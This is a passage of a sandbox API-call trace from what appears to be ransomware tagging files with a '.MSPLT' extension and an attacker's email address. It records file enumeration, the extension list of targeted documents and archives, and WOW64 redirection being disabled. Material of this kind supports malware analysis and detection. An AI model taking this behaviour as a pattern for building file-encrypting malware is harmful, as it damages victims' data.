dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.744] SetEndOfFile (hFile=0x554) returned 1 [0320.750] CloseHandle (hObject=0x554) returned 1 [0320.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) Thread: id = 48 os_tid = 0xe20 [0283.172] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x39144c0 [0283.172] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x39244c8 [0283.173] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc558 [0283.173] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6) returned 0x50b5a8 [0283.173] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc570 [0283.173] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100000) returned 0x3ec4020 [0283.177] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc588 [0283.177] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc588, Size=0x20) returned 0x4ade30 [0283.177] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc588 [0283.177] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc588, Size=0x20) returned 0x4ae010 [0283.178] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0283.178] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0283.178] Wow64DisableWow64FsRedirection (in: OldValue=0x35dff50 | out: OldValue=0x35dff50*=0x0) returned 1 [0283.178] lstrlenW (lpString="kernel32.dll") returned 12 [0283.178] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ade30 | out: hHeap=0x470000) returned 1 [0283.178] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0283.178] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae010 | out: hHeap=0x470000) returned 1 [0283.178] Sleep (dwMilliseconds=0x64) [0283.509] Sleep (dwMilliseconds=0x64) [0283.792] Sleep (dwMilliseconds=0x64) [0284.038] Sleep (dwMilliseconds=0x64) [0284.326] Sleep (dwMilliseconds=0x64) [0284.489] Sleep (dwMilliseconds=0x64) [0284.823] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0284.824] lstrlenW (lpString="memtest.exe.mui") returned 15 [0284.824] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0285.010] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=45472) returned 1 [0285.010] CloseHandle (hObject=0x3b0) returned 1 [0285.010] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui")) returned 0x20 [0285.011] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.011] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.011] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0285.011] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0285.011] lstrlenW (lpString=".doc") returned 4 [0285.011] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.011] lstrlenW (lpString=".docx") returned 5 [0285.011] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.011] lstrlenW (lpString=".pdf") returned 4 [0285.011] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.011] lstrlenW (lpString=".xls") returned 4 [0285.011] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.011] lstrlenW (lpString=".xlsx") returned 5 [0285.011] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.011] lstrlenW (lpString=".ppt") returned 4 [0285.011] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.011] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0285.011] lstrlenW (lpString=".zip") returned 4 [0285.011] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.011] lstrlenW (lpString=".rar") returned 4 [0285.011] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.011] lstrlenW (lpString=".bz2") returned 4 [0285.012] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.012] lstrlenW (lpString=".7z") returned 3 [0285.012] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.012] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0285.012] lstrlenW (lpString=".dbf") returned 4 [0285.012] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.012] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0285.012] lstrlenW (lpString=".1cd") returned 4 [0285.012] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.012] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0285.012] lstrlenW (lpString=".jpg") returned 4 [0285.012] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.012] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0285.012] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0285.012] lstrlenW (lpString=".doc") returned 4 [0285.012] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.012] lstrlenW (lpString=".docx") returned 5 [0285.012] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.012] lstrlenW (lpString=".pdf") returned 4 [0285.012] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.012] lstrlenW (lpString=".xls") returned 4 [0285.012] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.012] lstrlenW (lpString=".xlsx") returned 5 [0285.012] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.012] lstrlenW (lpString=".ppt") returned 4 [0285.012] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.013] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0285.013] lstrlenW (lpString=".zip") returned 4 [0285.013] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.013] lstrlenW (lpString=".rar") returned 4 [0285.013] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.013] lstrlenW (lpString=".bz2") returned 4 [0285.013] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.013] lstrlenW (lpString=".7z") returned 3 [0285.013] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.013] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0285.013] lstrlenW (lpString=".dbf") returned 4 [0285.013] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.013] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0285.013] lstrlenW (lpString=".1cd") returned 4 [0285.013] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.013] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0285.013] lstrlenW (lpString=".jpg") returned 4 [0285.013] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.013] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0285.013] lstrlenW (lpString="memtest.exe.mui") returned 15 [0285.014] CreateFileW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0285.015] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=45984) returned 1 [0285.015] CloseHandle (hObject=0x3b0) returned 1 [0285.015] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui")) returned 0x20 [0285.015] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.015] CreateFileW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.015] lstrlenW (lpString="C:\\Boot\\de-DE\\memtest.exe.mui") returned 29 [0285.016] lstrlenW (lpString="C:\\Boot\\de-DE\\memtest.exe.mui") returned 29 [0285.016] lstrlenW (lpString=".doc") returned 4 [0285.016] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.016] lstrlenW (lpString=".docx") returned 5 [0285.016] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.016] lstrlenW (lpString=".pdf") returned 4 [0285.016] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.016] lstrlenW (lpString=".xls") returned 4 [0285.016] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.016] lstrlenW (lpString=".xlsx") returned 5 [0285.016] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.016] lstrlenW (lpString=".ppt") returned 4 [0285.016] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.016] lstrlenW (lpString="C:\\Boot\\de-DE\\memtest.exe.mui") returned 29 [0285.016] lstrlenW (lpString=".zip") returned 4 [0285.016] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.016] lstrlenW (lpString=".rar") returned 4 [0285.016] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.016] lstrlenW (lpString=".bz2") returned 4 [0285.016] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.016] lstrlenW (lpString=".7z") returned 3 [0285.016] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.016] lstrlenW (lpString="C:\\Boot\\de-DE\\memtest.exe.mui") returned 29 [0285.016] lstrlenW (lpString=".dbf") returned 4 [0285.016] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.016] lstrlenW (lpString="C:\\Boot\\de-DE\\memtest.exe.mui") returned 29 [0285.016] lstrlenW (lpString=".1cd") returned 4 [0285.016] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.016] lstrlenW (lpString="C:\\Boot\\de-DE\\memtest.exe.mui") returned 29 [0285.017] lstrlenW (lpString=".jpg") returned 4 [0285.017] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.017] lstrlenW (lpString="C:\\Boot\\de-DE\\memtest.exe.mui") returned 29 [0285.017] lstrlenW (lpString="C:\\Boot\\de-DE\\memtest.exe.mui") returned 29 [0285.017] lstrlenW (lpString=".doc") returned 4 [0285.017] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.017] lstrlenW (lpString=".docx") returned 5 [0285.017] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.017] lstrlenW (lpString=".pdf") returned 4 [0285.017] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.017] lstrlenW (lpString=".xls") returned 4 [0285.017] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.017] lstrlenW (lpString=".xlsx") returned 5 [0285.017] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.017] lstrlenW (lpString=".ppt") returned 4 [0285.017] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.017] lstrlenW (lpString="C:\\Boot\\de-DE\\memtest.exe.mui") returned 29 [0285.017] lstrlenW (lpString=".zip") returned 4 [0285.017] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.017] lstrlenW (lpString=".rar") returned 4 [0285.017] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.017] lstrlenW (lpString=".bz2") returned 4 [0285.017] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.017] lstrlenW (lpString=".7z") returned 3 [0285.017] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.017] lstrlenW (lpString="C:\\Boot\\de-DE\\memtest.exe.mui") returned 29 [0285.017] lstrlenW (lpString=".dbf") returned 4 [0285.018] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.018] lstrlenW (lpString="C:\\Boot\\de-DE\\memtest.exe.mui") returned 29 [0285.018] lstrlenW (lpString=".1cd") returned 4 [0285.018] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.018] lstrlenW (lpString="C:\\Boot\\de-DE\\memtest.exe.mui") returned 29 [0285.018] lstrlenW (lpString=".jpg") returned 4 [0285.018] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.018] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0285.018] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.018] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0285.019] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=80224) returned 1 [0285.019] CloseHandle (hObject=0x3b0) returned 1 [0285.019] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0285.019] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.019] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.019] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0285.019] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0285.019] lstrlenW (lpString=".doc") returned 4 [0285.019] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.019] lstrlenW (lpString=".docx") returned 5 [0285.019] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.019] lstrlenW (lpString=".pdf") returned 4 [0285.020] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.020] lstrlenW (lpString=".xls") returned 4 [0285.020] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.020] lstrlenW (lpString=".xlsx") returned 5 [0285.020] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.020] lstrlenW (lpString=".ppt") returned 4 [0285.020] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.020] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0285.020] lstrlenW (lpString=".zip") returned 4 [0285.020] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.020] lstrlenW (lpString=".rar") returned 4 [0285.020] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.020] lstrlenW (lpString=".bz2") returned 4 [0285.020] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.020] lstrlenW (lpString=".7z") returned 3 [0285.020] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.020] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0285.020] lstrlenW (lpString=".dbf") returned 4 [0285.020] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.020] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0285.020] lstrlenW (lpString=".1cd") returned 4 [0285.020] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.020] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0285.020] lstrlenW (lpString=".jpg") returned 4 [0285.020] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.020] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0285.021] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0285.021] lstrlenW (lpString=".doc") returned 4 [0285.021] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.021] lstrlenW (lpString=".docx") returned 5 [0285.021] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.021] lstrlenW (lpString=".pdf") returned 4 [0285.021] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.021] lstrlenW (lpString=".xls") returned 4 [0285.021] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.021] lstrlenW (lpString=".xlsx") returned 5 [0285.021] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.021] lstrlenW (lpString=".ppt") returned 4 [0285.021] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.021] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0285.021] lstrlenW (lpString=".zip") returned 4 [0285.021] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.021] lstrlenW (lpString=".rar") returned 4 [0285.021] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.021] lstrlenW (lpString=".bz2") returned 4 [0285.021] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.021] lstrlenW (lpString=".7z") returned 3 [0285.021] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.021] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0285.021] lstrlenW (lpString=".dbf") returned 4 [0285.021] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.021] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0285.021] lstrlenW (lpString=".1cd") returned 4 [0285.021] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.022] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0285.022] lstrlenW (lpString=".jpg") returned 4 [0285.022] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.022] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0285.022] lstrlenW (lpString="memtest.exe.mui") returned 15 [0285.022] CreateFileW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0285.023] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=46496) returned 1 [0285.024] CloseHandle (hObject=0x3b0) returned 1 [0285.024] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui")) returned 0x20 [0285.024] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.024] CreateFileW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.024] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0285.024] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0285.024] lstrlenW (lpString=".doc") returned 4 [0285.024] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.024] lstrlenW (lpString=".docx") returned 5 [0285.024] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.024] lstrlenW (lpString=".pdf") returned 4 [0285.024] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.024] lstrlenW (lpString=".xls") returned 4 [0285.024] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.024] lstrlenW (lpString=".xlsx") returned 5 [0285.024] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.024] lstrlenW (lpString=".ppt") returned 4 [0285.024] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.025] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0285.025] lstrlenW (lpString=".zip") returned 4 [0285.025] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.025] lstrlenW (lpString=".rar") returned 4 [0285.025] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.025] lstrlenW (lpString=".bz2") returned 4 [0285.025] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.025] lstrlenW (lpString=".7z") returned 3 [0285.025] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.025] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0285.025] lstrlenW (lpString=".dbf") returned 4 [0285.025] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.025] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0285.025] lstrlenW (lpString=".1cd") returned 4 [0285.025] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.025] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0285.025] lstrlenW (lpString=".jpg") returned 4 [0285.025] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.025] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0285.025] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0285.025] lstrlenW (lpString=".doc") returned 4 [0285.025] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.025] lstrlenW (lpString=".docx") returned 5 [0285.025] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.025] lstrlenW (lpString=".pdf") returned 4 [0285.026] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.026] lstrlenW (lpString=".xls") returned 4 [0285.026] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.026] lstrlenW (lpString=".xlsx") returned 5 [0285.026] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.026] lstrlenW (lpString=".ppt") returned 4 [0285.026] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.026] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0285.026] lstrlenW (lpString=".zip") returned 4 [0285.026] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.026] lstrlenW (lpString=".rar") returned 4 [0285.026] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.026] lstrlenW (lpString=".bz2") returned 4 [0285.026] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.026] lstrlenW (lpString=".7z") returned 3 [0285.026] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.026] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0285.026] lstrlenW (lpString=".dbf") returned 4 [0285.026] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.026] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0285.026] lstrlenW (lpString=".1cd") returned 4 [0285.026] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.026] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0285.026] lstrlenW (lpString=".jpg") returned 4 [0285.026] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.027] Sleep (dwMilliseconds=0x64) [0285.370] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0285.370] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.370] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0285.371] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=77664) returned 1 [0285.371] CloseHandle (hObject=0x3b4) returned 1 [0285.371] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0285.371] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.371] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.372] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0285.372] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0285.372] lstrlenW (lpString=".doc") returned 4 [0285.372] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.372] lstrlenW (lpString=".docx") returned 5 [0285.372] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.372] lstrlenW (lpString=".pdf") returned 4 [0285.372] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.372] lstrlenW (lpString=".xls") returned 4 [0285.372] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.372] lstrlenW (lpString=".xlsx") returned 5 [0285.372] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.372] lstrlenW (lpString=".ppt") returned 4 [0285.372] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.372] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0285.372] lstrlenW (lpString=".zip") returned 4 [0285.372] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.372] lstrlenW (lpString=".rar") returned 4 [0285.372] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.372] lstrlenW (lpString=".bz2") returned 4 [0285.372] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.372] lstrlenW (lpString=".7z") returned 3 [0285.372] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.372] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0285.372] lstrlenW (lpString=".dbf") returned 4 [0285.372] lstrcmpiW (lpString1=".dbf", 